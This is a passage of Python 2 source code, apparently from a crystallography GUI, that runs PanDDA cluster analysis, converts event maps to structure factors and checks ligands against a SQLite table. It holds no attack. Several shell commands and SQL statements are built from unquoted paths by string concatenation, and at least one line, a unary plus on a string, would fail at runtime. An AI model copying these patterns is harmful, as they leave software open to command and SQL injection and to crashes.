self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.cluster_mtzs_and_pdbs')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.cluster_mtzs_and_pdbs')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
# - required input paramters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
# remove exisiting mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
# event maps generated with pandda v0.2 or higher have the same symmetry as the crystal
# but phenix.map_to_structure_facors only accepts maps in spg P1
# therefore map is first expanded to full unit cell and spg of map then set tp p1
# other conversion option like cinvfft give for whatever reason uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
' RESOLUTION %s\n' %self.resolution+
' END\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
'xyzlin cell\n'
'symmetry p1\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
if float(self.resolution) < 1.21: # program complains if resolution is 1.2 or higher
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
pdb_extract_init += +os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
self.Logfile.insert('chanfing to '+self.panddaDir)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print xtal,db_dict
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
# now need to check if there is a unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
